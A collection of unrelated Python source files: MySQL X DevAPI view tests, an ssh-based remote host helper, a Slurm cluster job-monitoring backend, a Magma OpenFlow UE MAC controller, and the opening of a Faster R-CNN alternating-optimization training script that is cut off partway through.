# Using sort() should deallocate the prepared statement:
# Prepare::Deallocate + Crud::Delete
delete.bind("id", 3).sort("age ASC").execute()
self.assertTrue(expected_stmt_attrs(delete, False, False, False, 1))
# On the second call should: Prepare::Prepare + Prepare::Execute
delete.bind("id", 4).execute()
self.assertTrue(expected_stmt_attrs(delete, False, True, True, 2))
# On subsequent calls should: Prepare::Execute
delete.bind("id", 5).execute()
self.assertTrue(expected_stmt_attrs(delete, False, True, True, 3))
row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[2]
expected_sql_text = ("DELETE FROM `{}`.`{}` "
"WHERE (`id` = ?) ORDER BY `age`"
"".format(self.schema_name, table_name))
self.assertEqual(row[0], expected_sql_text)
self.assertEqual(row[1], delete.exec_counter - 1)
drop_table(schema, table_name)
session.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 14), "XPlugin not compatible")
class MySQLxViewTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.schema_name = self.connect_kwargs["schema"]
self.table_name = "table_test"
self.view_name = "view_test"
try:
self.session = mysqlx.get_session(self.connect_kwargs)
except mysqlx.Error as err:
self.fail("{0}".format(err))
self.schema = self.session.get_schema(self.schema_name)
def tearDown(self):
drop_table(self.schema, self.table_name)
drop_view(self.schema, self.view_name)
self.session.close()
def test_exists_in_database(self):
view = self.schema.get_view(self.view_name)
self.assertFalse(view.exists_in_database())
self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
self.schema_name, self.table_name)).execute()
defined_as = "SELECT id FROM {0}.{1}".format(self.schema_name,
self.table_name)
view = create_view(self.schema, self.view_name, defined_as)
self.assertTrue(view.exists_in_database())
def test_select(self):
table_name = "{0}.{1}".format(self.schema_name, self.table_name)
self.session.sql("CREATE TABLE {0} (age INT, name VARCHAR(50))"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (21, 'Fred')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (28, 'Barney')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (42, 'Wilma')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (67, 'Betty')"
"".format(table_name)).execute()
defined_as = "SELECT age, name FROM {0}".format(table_name)
view = create_view(self.schema, self.view_name, defined_as)
result = view.select().order_by("age DESC").execute()
rows = result.fetch_all()
self.assertEqual(4, len(rows))
self.assertEqual(67, rows[0]["age"])
result = view.select("age").where("age = 42").execute()
self.assertEqual(1, len(result.columns))
rows = result.fetch_all()
self.assertEqual(1, len(rows))
# test flexible params
result = view.select(['age', 'name']).order_by("age DESC").execute()
rows = result.fetch_all()
self.assertEqual(4, len(rows))
def test_having(self):
table_name = "{0}.{1}".format(self.schema_name, self.table_name)
self.session.sql("CREATE TABLE {0} (age INT, name VARCHAR(50), "
"gender CHAR(1))".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (21, 'Fred', 'M')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (28, 'Barney', 'M')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (42, 'Wilma', 'F')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (67, 'Betty', 'F')"
"".format(table_name)).execute()
defined_as = "SELECT age, name, gender FROM {0}".format(table_name)
view = create_view(self.schema, self.view_name, defined_as)
result = view.select().group_by("gender").order_by("age ASC").execute()
rows = result.fetch_all()
self.assertEqual(2, len(rows))
self.assertEqual(21, rows[0]["age"])
self.assertEqual(42, rows[1]["age"])
result = view.select().group_by("gender").having("gender = 'F'") \
.order_by("age ASC").execute()
rows = result.fetch_all()
self.assertEqual(1, len(rows))
self.assertEqual(42, rows[0]["age"])
# test flexible params
result = view.select().group_by(["gender"]) \
.order_by(["name DESC", "age ASC"]).execute()
rows = result.fetch_all()
self.assertEqual(2, len(rows))
self.assertEqual(42, rows[0]["age"])
self.assertEqual(21, rows[1]["age"])
def test_insert(self):
table_name = "{0}.{1}".format(self.schema_name, self.table_name)
self.session.sql("CREATE TABLE {0} (age INT, name VARCHAR(50), "
"gender CHAR(1))".format(table_name)).execute()
defined_as = "SELECT age, name, gender FROM {0}".format(table_name)
view = create_view(self.schema, self.view_name, defined_as)
result = view.insert("age", "name").values(21, 'Fred') \
.values(28, 'Barney') \
.values(42, 'Wilma') \
.values(67, 'Betty').execute()
result = view.select().execute()
rows = result.fetch_all()
self.assertEqual(4, len(rows))
# test flexible params
result = view.insert(["age", "name"]).values([35, 'Eddard']) \
.values(9, 'Arya').execute()
result = view.select().execute()
rows = result.fetch_all()
self.assertEqual(6, len(rows))
def test_update(self):
table_name = "{0}.{1}".format(self.schema_name, self.table_name)
self.session.sql("CREATE TABLE {0} (age INT, name VARCHAR(50), "
"gender CHAR(1))".format(table_name)).execute()
defined_as = ("SELECT age, name, gender FROM {0}".format(table_name))
view = create_view(self.schema, self.view_name, defined_as)
result = view.insert("age", "name").values(21, 'Fred') \
.values(28, 'Barney') \
.values(42, 'Wilma') \
.values(67, 'Betty').execute()
result = view.update().set("age", 25).where("age == 21").execute()
self.assertEqual(1, result.get_affected_items_count())
drop_table(self.schema, "test")
def test_delete(self):
self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
self.schema_name, self.table_name)).execute()
self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
self.schema_name, self.table_name, "1")).execute()
defined_as = "SELECT id FROM {0}.{1}".format(self.schema_name,
self.table_name)
view = create_view(self.schema, self.view_name, defined_as)
self.assertEqual(view.count(), 1)
view.delete().where("id = 1").execute()
self.assertEqual(view.count(), 0)
def test_count(self):
self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
self.schema_name, self.table_name)).execute()
self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
self.schema_name, self.table_name, "1")).execute()
defined_as = "SELECT id FROM {0}.{1}".format(self.schema_name,
self.table_name)
view = create_view(self.schema, self.view_name, defined_as)
self.assertEqual(view.count(), 1)
drop_view(self.schema, self.view_name)
self.assertRaises(mysqlx.OperationalError, view.count)
def test_results(self):
table_name = "{0}.{1}".format(self.schema_name, self.table_name)
self.session.sql("CREATE TABLE {0} (age INT, name VARCHAR(50))"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (21, 'Fred')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (28, 'Barney')"
"".format(table_name)).execute()
defined_as = "SELECT age, name FROM {0}".format(table_name)
view = create_view(self.schema, self.view_name, defined_as)
result = view.select().execute()
self.assertEqual("Fred", result.fetch_one()["name"])
self.assertEqual("Barney", result.fetch_one()["name"])
self.assertEqual(None, result.fetch_one())
def test_auto_inc_value(self):
table_name = "{0}.{1}".format(self.schema_name, self.table_name)
self.session.sql("CREATE TABLE {0} (id INT KEY AUTO_INCREMENT, "
"name VARCHAR(50))".format(table_name)).execute()
result = self.session.sql("INSERT INTO {0} VALUES (NULL, 'Fred')"
"".format(table_name)).execute()
self.assertEqual(1, result.get_autoincrement_value())
defined_as = "SELECT id, name FROM {0}".format(table_name)
view = create_view(self.schema, self.view_name, defined_as)
result2 = view.insert("id", "name").values(None, "Boo").execute()
self.assertEqual(2, result2.get_autoincrement_value())
def test_column_metadata(self):
table_name = "{0}.{1}".format(self.schema_name, self.table_name)
self.session.sql(
"CREATE TABLE {0}(age INT, name VARCHAR(50), pic VARBINARY(100), "
"config JSON, created DATE, active BIT)"
"".format(table_name)).execute()
self.session.sql(
"INSERT INTO {0} VALUES (21, 'Fred', NULL, NULL, '2008-07-26', 0)"
"".format(table_name)).execute()
self.session.sql(
"INSERT INTO {0} VALUES (28, 'Barney', NULL, NULL, '2012-03-12'"
", 0)".format(table_name)).execute()
self.session.sql(
"INSERT INTO {0} VALUES (42, 'Wilma', NULL, NULL, '1975-11-11', 1)"
"".format(table_name)).execute()
self.session.sql(
"INSERT INTO {0} VALUES (67, 'Betty', NULL, NULL, '2015-06-21', 0)"
"".format(table_name)).execute()
defined_as = ("SELECT age, name, pic, config, created, active FROM {0}"
"".format(table_name))
view = create_view(self.schema, self.view_name, defined_as)
result = view.select().execute()
result.fetch_all()
col = result.columns[0]
self.assertEqual("age", col.get_column_name())
self.assertEqual(self.view_name, col.get_table_name())
self.assertEqual(mysqlx.ColumnType.INT, col.get_type())
col = result.columns[1]
self.assertEqual("name", col.get_column_name())
self.assertEqual(self.view_name, col.get_table_name())
self.assertEqual(mysqlx.ColumnType.STRING, col.get_type())
col = result.columns[2]
self.assertEqual("pic", col.get_column_name())
self.assertEqual(self.view_name, col.get_table_name())
self.assertEqual("binary", col.get_collation_name())
self.assertEqual("binary", col.get_character_set_name())
self.assertEqual(mysqlx.ColumnType.BYTES, col.get_type())
col = result.columns[3]
self.assertEqual("config", col.get_column_name())
self.assertEqual(self.view_name, col.get_table_name())
self.assertEqual(mysqlx.ColumnType.JSON, col.get_type())
col = result.columns[5]
self.assertEqual("active", col.get_column_name())
self.assertEqual(self.view_name, col.get_table_name())
self.assertEqual(mysqlx.ColumnType.BIT, col.get_type())
|
remotehost.py | # Host class
# Copyright (c) 2016, Qualcomm Atheros, Inc.
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
import subprocess
import threading
logger = logging.getLogger()
def execute_thread(command, reply):
try:
status = 0;
buf = subprocess.check_output(command, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
status = e.returncode
buf = e.output
cmd = ""
for c in command:
cmd = cmd + " " + c
logger.debug("thread cmd: " + cmd)
logger.debug("thread exit status: " + str(status))
logger.debug("thread exit buf: " + str(buf))
reply.append(status)
reply.append(buf)
class Host():
def __init__(self, host=None, ifname=None, port=None, name="", user="root"):
self.host = host
self.name = name
self.user = user
self.ifname = ifname
self.port = port
if self.name == "" and host != None:
self.name = host
def local_execute(self, command):
logger.debug("execute: " + str(command))
try:
status = 0;
buf = subprocess.check_output(command, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
status = e.returncode
buf = e.output
logger.debug("status: " + str(status))
logger.debug("buf: " + str(buf))
return status, buf
def execute(self, command):
if self.host is None:
return self.local_execute(command)
cmd = ["ssh", self.user + "@" + self.host, ' '.join(command)]
_cmd = self.name + " execute: "
for c in cmd:
_cmd = _cmd + " " + c
logger.debug(_cmd)
try:
status = 0
buf = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
status = e.returncode
buf = e.output
logger.debug(self.name + " status: " + str(status))
logger.debug(self.name + " buf: " + str(buf))
return status, buf
# async execute
def execute_run(self, command, res):
if self.host is None:
cmd = command
else:
cmd = ["ssh", self.user + "@" + self.host, ' '.join(command)]
_cmd = self.name + " execute_run: "
for c in cmd:
_cmd = _cmd + " " + c
logger.debug(_cmd)
t = threading.Thread(target = execute_thread, args=(cmd, res))
t.start()
return t
def wait_execute_complete(self, t, wait=None):
if wait == None:
wait_str = "infinite"
else:
wait_str = str(wait) + "s"
logger.debug(self.name + " wait_execute_complete(" + wait_str + "): ")
if t.isAlive():
t.join(wait)
|
backend.py | import copy
import functools
import logging
import os
import re
import shutil
import subprocess
import threading
from collections import OrderedDict
from queue import Queue
from time import sleep
from typing import Iterable, List
import fabric
from paramiko.ssh_exception import SSHException
__all__ = ["Cluster"]
logger = logging.getLogger("stui.backend")
def when_connected(deocrated_f):
@functools.wraps(deocrated_f)
def f(self, *args, **kwargs):
if not self.is_ready.is_set():
raise EnvironmentError # TODO: Use a sensible exception
return deocrated_f(self, *args, **kwargs)
return f
class Job(object):
def __init__(self, fields: Iterable[str], squeue_str: str):
super().__init__()
self.whole_line = squeue_str
squeue_dict = {k: v for k, v in zip(fields, squeue_str.split("|"))}
self.job_id = squeue_dict["job_id_unique"]
self.job_id_combined = squeue_dict["job_id_base_idx"]
self.job_id_base = squeue_dict["job_id_base"]
self.job_id_idx = squeue_dict["job_id_idx"]
self.nodes = squeue_dict["nodes"].split(",")
self.partition = squeue_dict["partition"]
self.name = squeue_dict["job_name"]
self.user = squeue_dict["user"]
self.state = squeue_dict["state"]
self.time = squeue_dict["time"]
self.nice = squeue_dict["nice"]
self.cpus = squeue_dict["cpus"]
self.gres = squeue_dict["tres"]
self.is_array_job = False if self.job_id_idx == "N/A" else True
self.array_total_jobs = None
self.array_throttle = None
if self.is_array_job and self.is_pending():
if "%" in self.job_id_idx:
match = re.search(r"(\d+)%(\d+)$", self.job_id_idx)
if match:
self.array_total_jobs = match.group(1)
self.array_throttle = match.group(2)
else:
# TODO: are there [ ]s?
match = re.search(r"_\[(\d+)\]$", self.job_id_idx)
if match:
self.array_total_jobs = match.group(1)
def __repr__(self):
return f"Job {self.job_id} - State{self.state}"
def is_running(self):
return self.state == "RUNNING"
def is_pending(self):
return self.state == "PENDING"
def uses_gpu(self):
return "gpu" in self.gres
def is_array_job_f(self):
return self.is_array_job # TODO: use property?
def array_str(self):
if not self.is_array_job:
return ""
else:
return self.job_id_idx
class Cluster(threading.Thread):
def __init__(self, remote=None):
super().__init__()
self.use_fabric = True
self.remote = remote
self.is_ready = threading.Event()
self.latest_jobs = []
self.lock = threading.Lock()
self.requests = Queue()
self.thread = None
def connect(self, fd, ssh_username=None, ssh_password=None):
self.fd = fd
self.ssh_username = ssh_username
self.ssh_password = ssh_password
if self.thread is not None:
self.thread.join()
self.thread = threading.Thread(target=self._thread_fn, daemon=True)
self.thread.start()
def _thread_fn(self):
if self.remote is None:
if shutil.which("sinfo") is None:
# TODO: Test this!
raise SystemExit("Slurm binaries not found.")
elif self.use_fabric:
connect_kwargs = {
"password": self.ssh_password,
"look_for_keys": True,
"allow_agent": True,
"auth_timeout": 10,
"timeout": 5,
}
self.fabric_connection = fabric.Connection(
self.remote, user=self.ssh_username, connect_kwargs=connect_kwargs
)
try:
self.fabric_connection.open()
except SSHException as e:
if str(e) == "No authentication methods available":
os.write(self.fd, b"need password")
elif str(e) == "Authentication failed.":
os.write(self.fd, b"wrong password")
else:
raise SystemExit("Lost SSH connection.")
return
self.me = self._run_command("whoami")[0] # TODO
self.config = self._get_config()
self.my_partitions, self.all_partitions = self._get_partition_info()
self.is_ready.set()
os.write(self.fd, b"connection established")
os.close(self.fd)
self.fd = None
try:
while True:
latest_jobs = self._get_jobs()
with self.lock:
self.latest_jobs = latest_jobs
if not self.requests.empty():
cmd = self.requests.get(block=False)
self._run_command(cmd)
sleep(1)
except:
# if self.remote:
# self.fabric_connection.close()
# self.fabric_connection = fabric.Connection(self.remote)
# self.fabric_connection.open()
raise SystemExit("Something went wrong.")
def _run_command(self, cmd: str):
if self.remote is not None:
if self.use_fabric:
results = self.fabric_connection.run(cmd, hide=True)
o = results.stdout.splitlines()
else:
cmd = f"ssh {self.remote} {cmd}"
process = subprocess.run(cmd.split(" "), capture_output=True)
o = process.stdout.decode("utf-8").splitlines()
else:
process = subprocess.run(cmd.split(" "), capture_output=True)
o = process.stdout.decode("utf-8").splitlines()
# TODO: for some reason lines are surrounded by quotes when not using SSH
o = [line.strip('"') for line in o]
return o
def _get_config(self):
o = self._run_command("scontrol show config")
pattern = r"(\S+)\s*=(.*)"
config = {}
for line in o[1:]:
try:
match = re.search(pattern, line)
config[match.group(1)] = match.group(2)
except:
continue
return config
def _get_partition_info(self):
my_p = self._run_command('sinfo --format="%R" --noheader')
all_p = self._run_command('sinfo --format="%R" --noheader --all')
return my_p, all_p
def _get_jobs(self) -> List[Job]:
"""
squeue has two formatting commands: --format and --Format (-o and -O). The
former is more flexible in terms of constructing a string but it uses single
letters for each field and slurm devs eventually ran out of letters to use! I
think going forward they want peopel to use the long format. Some of the short
format flags are not even documented, including the %b which I use is used to
display TRES_PER_NODE. However, I prefer to use the short format because I can
put my own delimeter character. It also assigns as many characters as needed to
fully display a field. --Format on the other hand assigns 20 characters by
default although you can specify more.
Returns: List[Job]
"""
fields = OrderedDict(
{
"job_id_unique": r"%A", # for job arrays this will have a unique value for each element
"job_id_base_idx": r"%i", # for job arrays has the form "<base_job_id>_<index>"
"job_id_base": r"%F", # Job array's base job ID. For non-array jobs, this is the job ID
"job_id_idx": r"%K", # Job array's index
"cpus": r"%C",
"job_name": r"%j",
"partition": r"%P",
"reason": r"%r",
"user": r"%u",
"nice": r"%y",
"state": r"%T",
"time": r"%M",
"tres": r"%b",
"nodes": r"%N",
}
)
cmd = f'squeue --noheader --all --format="{"|".join(fields.values())}"'
cmd_output = self._run_command(cmd)
return [Job(fields.keys(), line) for line in cmd_output]
@when_connected
def get_name(self):
return self.config["ClusterName"]
@when_connected
def get_jobs(self):
with self.lock:
jobs_copy = copy.deepcopy(self.latest_jobs)
return jobs_copy
@when_connected
def cancel_jobs(self, jobs):
job_ids = " ".join(str(j.job_id) for j in jobs)
self.requests.put(f"scancel {job_ids}")
@when_connected
def cancel_my_jobs(self):
self.requests.put(f"scancel -u {self.me}")
@when_connected
def cancel_my_newest_job(self):
self.requests.put(
f'squeue -u {self.me} --sort=-V -h --format="%A" | head -n 1 | xargs scancel'
)
@when_connected
def cancel_my_oldest_job(self):
self.requests.put(
f'squeue -u {self.me} --sort=+V -h --format="%A" | head -n 1 | xargs scancel'
)
|
ue_mac.py | """
Copyright (c) Facebook, Inc. and its affiliates.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
"""
from collections import namedtuple
import threading
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, set_ev_cls
from ryu.lib.packet import packet
from ryu.lib.packet import ether_types, dhcp
from ryu.ofproto.inet import IPPROTO_TCP, IPPROTO_UDP
from magma.pipelined.app.base import MagmaController, ControllerType
from magma.pipelined.app.inout import INGRESS
from magma.pipelined.directoryd_client import update_record
from magma.pipelined.imsi import encode_imsi, decode_imsi
from magma.pipelined.openflow import flows
from magma.pipelined.openflow.exceptions import MagmaOFError
from magma.pipelined.openflow.magma_match import MagmaMatch
from magma.pipelined.openflow.registers import IMSI_REG, load_passthrough
class UEMacAddressController(MagmaController):
"""
UE MAC Address Controller
This controller controls table 0 which is the first table every packet
touches. It matches on UE MAC address and sets IMSI metadata
"""
APP_NAME = "ue_mac"
APP_TYPE = ControllerType.SPECIAL
UEMacConfig = namedtuple(
'UEMacConfig',
['gre_tunnel_port'],
)
def __init__(self, *args, **kwargs):
super(UEMacAddressController, self).__init__(*args, **kwargs)
self.config = self._get_config(kwargs['config'])
self.tbl_num = self._service_manager.get_table_num(self.APP_NAME)
self.next_table = \
self._service_manager.get_table_num(INGRESS)
self.arpd_controller_fut = kwargs['app_futures']['arpd']
self.arp_contoller = None
self._datapath = None
self._dhcp_learn_scratch = \
self._service_manager.allocate_scratch_tables(self.APP_NAME, 1)[0]
def _get_config(self, config_dict):
return self.UEMacConfig(
# TODO: rename port number to a tunneling protocol agnostic name
gre_tunnel_port=config_dict['ovs_gtp_port_number'],
)
def initialize_on_connect(self, datapath):
flows.delete_all_flows_from_table(datapath,
self._service_manager.get_table_num(
self.APP_NAME))
self._datapath = datapath
self._install_default_flows()
def cleanup_on_disconnect(self, datapath):
flows.delete_all_flows_from_table(datapath,
self._service_manager.get_table_num(
self.APP_NAME))
def add_ue_mac_flow(self, sid, mac_addr):
self._add_dhcp_passthrough_flows(sid, mac_addr)
self._add_dns_passthrough_flows(sid, mac_addr)
uplink_match = MagmaMatch(eth_src=mac_addr)
self._add_resubmit_flow(sid, uplink_match,
priority=flows.UE_FLOW_PRIORITY)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._add_resubmit_flow(sid, downlink_match,
priority=flows.UE_FLOW_PRIORITY)
def delete_ue_mac_flow(self, sid, mac_addr):
self._delete_dhcp_passthrough_flows(sid, mac_addr)
self._delete_dns_passthrough_flows(sid, mac_addr)
uplink_match = MagmaMatch(eth_src=mac_addr)
self._delete_resubmit_flow(sid, uplink_match)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._delete_resubmit_flow(sid, downlink_match)
def add_arp_response_flow(self, imsi, yiaddr, chaddr):
if self.arp_contoller or self.arpd_controller_fut.done():
if not self.arp_contoller:
self.arp_contoller = self.arpd_controller_fut.result()
self.arp_contoller.add_ue_arp_flows(self._datapath,
yiaddr, chaddr)
self.logger.debug("Learned arp for imsi %s, ip %s", imsi, yiaddr)
# Associate IMSI to IPv4 addr in directory service
threading.Thread(target=update_record, args=(str(imsi),
yiaddr)).start()
else:
self.logger.error("ARPD controller not ready, ARP learn FAILED")
def _add_resubmit_flow(self, sid, match, action=None,
priority=flows.DEFAULT_PRIORITY,
next_table=None):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
if next_table is None:
next_table = self.next_table
# Add IMSI metadata
actions.append(
parser.NXActionRegLoad2(dst=IMSI_REG, value=encode_imsi(sid)))
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
match, actions=actions,
priority=priority,
resubmit_table=next_table)
def _delete_resubmit_flow(self, sid, match, action=None):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
# Add IMSI metadata
actions.append(
parser.NXActionRegLoad2(dst=IMSI_REG, value=encode_imsi(sid)))
flows.delete_flow(self._datapath, self.tbl_num, match, actions=actions)
def _add_dns_passthrough_flows(self, sid, mac_addr):
parser = self._datapath.ofproto_parser
# Set so packet skips enforcement and send to egress
action = load_passthrough(parser)
# Install UDP flows for DNS
ulink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_dst=53,
eth_src=mac_addr)
self._add_resubmit_flow(sid, ulink_match_udp, action,
flows.PASSTHROUGH_PRIORITY)
dlink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=53,
eth_dst=mac_addr)
self._add_resubmit_flow(sid, dlink_match_udp, action,
flows.PASSTHROUGH_PRIORITY)
# Install TCP flows for DNS
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=53,
eth_src=mac_addr)
self._add_resubmit_flow(sid, ulink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=53,
eth_dst=mac_addr)
self._add_resubmit_flow(sid, dlink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY)
def _delete_dns_passthrough_flows(self, sid, mac_addr):
parser = self._datapath.ofproto_parser
# Set so packet skips enforcement controller
action = load_passthrough(parser)
# Install UDP flows for DNS
ulink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_dst=53,
eth_src=mac_addr)
self._delete_resubmit_flow(sid, ulink_match_udp, action)
dlink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=53,
eth_dst=mac_addr)
self._delete_resubmit_flow(sid, dlink_match_udp, action)
# Install TCP flows for DNS
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=53,
eth_src=mac_addr)
self._delete_resubmit_flow(sid, ulink_match_tcp, action)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=53,
eth_dst=mac_addr)
self._delete_resubmit_flow(sid, dlink_match_tcp, action)
def _add_dhcp_passthrough_flows(self, sid, mac_addr):
ofproto, parser = self._datapath.ofproto, self._datapath.ofproto_parser
# Set so packet skips enforcement controller
action = load_passthrough(parser)
uplink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=68,
udp_dst=67,
eth_src=mac_addr)
self._add_resubmit_flow(sid, uplink_match, action,
flows.PASSTHROUGH_PRIORITY)
downlink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=67,
udp_dst=68,
eth_dst=mac_addr)
# Set so triggers packetin and we can learn the ip to do arp response
self._add_resubmit_flow(sid, downlink_match, action,
flows.PASSTHROUGH_PRIORITY, next_table=self._dhcp_learn_scratch)
# Install default flow for dhcp learn scratch
imsi_match = MagmaMatch(imsi=encode_imsi(sid))
flows.add_output_flow(self._datapath, self._dhcp_learn_scratch,
match=imsi_match, actions=[],
priority=flows.PASSTHROUGH_PRIORITY,
output_port=ofproto.OFPP_CONTROLLER,
copy_table=self.next_table,
max_len=ofproto.OFPCML_NO_BUFFER)
def _delete_dhcp_passthrough_flows(self, sid, mac_addr):
parser = self._datapath.ofproto_parser
# Set so packet skips enforcement controller
action = load_passthrough(parser)
uplink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=68,
udp_dst=67,
eth_src=mac_addr)
self._delete_resubmit_flow(sid, uplink_match, action)
downlink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=67,
udp_dst=68,
eth_dst=mac_addr)
self._delete_resubmit_flow(sid, downlink_match, action)
imsi_match = MagmaMatch(imsi=encode_imsi(sid))
flows.delete_flow(self._datapath, self._dhcp_learn_scratch, imsi_match)
def _add_uplink_arp_allow_flow(self):
arp_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_ARP)
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
arp_match, actions=[],
priority=flows.DEFAULT_PRIORITY,
resubmit_table=self.next_table)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _learn_arp_entry(self, ev):
"""
Learn action to process PacketIn DHCP packets, dhcp ack packets will
be used to learn the ARP entry for the UE to install rules in the arp
table. The DHCP packets will then be sent thorugh the pipeline.
"""
msg = ev.msg
if self._dhcp_learn_scratch != msg.table_id:
# Intended for other application
return
try:
encoded_imsi = _get_encoded_imsi_from_packetin(msg)
# Decode the imsi to properly save in directoryd
imsi = decode_imsi(encoded_imsi)
except MagmaOFError as e:
# No packet direction, but intended for this table
self.logger.error("Error obtaining IMSI from pkt-in: %s", e)
return
pkt = packet.Packet(msg.data)
dhcp_header = pkt.get_protocols(dhcp.dhcp)[0]
# DHCP yiaddr is the client(UE) ip addr
# chaddr is the client mac address
self.add_arp_response_flow(imsi, dhcp_header.yiaddr, dhcp_header.chaddr)
def _install_default_flows(self):
"""
Install default flows
"""
# Allows arp packets from uplink(no eth dst set) to go to the arp table
self._add_uplink_arp_allow_flow()
# TODO We might want a default drop all rule with min priority, but
# adding it breakes all unit tests for this controller(needs work)
def _get_encoded_imsi_from_packetin(msg):
"""
Retrieve encoded imsi from the Packet-In message, or raise an exception if
it doesn't exist.
"""
imsi = msg.match.get(IMSI_REG)
if imsi is None:
raise MagmaOFError('IMSI not found in OFPMatch')
return imsi
|
train_faster_rcnn_alt_opt.py | #!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
parser.add_argument('--gpu', dest='gpu_id',
help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--net_name', dest='net_name',
help='network name (e.g., "ZF")',
default=None, type=str)
parser.add_argument('--weights', dest='pretrained_model',
help='initialize with pretrained model weights',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to train on',
default='voc_2007_trainval', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--final', dest='final_path', help='set config keys', default=None)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for training'.format(imdb.name)
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(net_name):
# Faster R-CNN Alternating Optimization
n = 'faster_rcnn_alt_opt'
# Solver for each training stage
solvers = [[net_name, n, 'stage1_rpn_solver60k80k.pt'],
[net_name, n, 'stage1_fast_rcnn_solver30k40k.pt'],
[net_name, n, 'stage2_rpn_solver60k80k.pt'],
[net_name, n, 'stage2_fast_rcnn_solver30k40k.pt']]
solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers]
# Iterations for each training stage
max_iters = [40000, 20000, 40000, 20000]
#max_iters = [10, 10, 10, 10]
#max_iters = [10000, 5000, 5000, 2500]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
cfg.MODELS_DIR, net_name, n, 'rpn_test.pt')
return solvers, max_iters, rpn_test_prototxt
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
# (e.g. "del net" in Python code). To work around this issue, each training
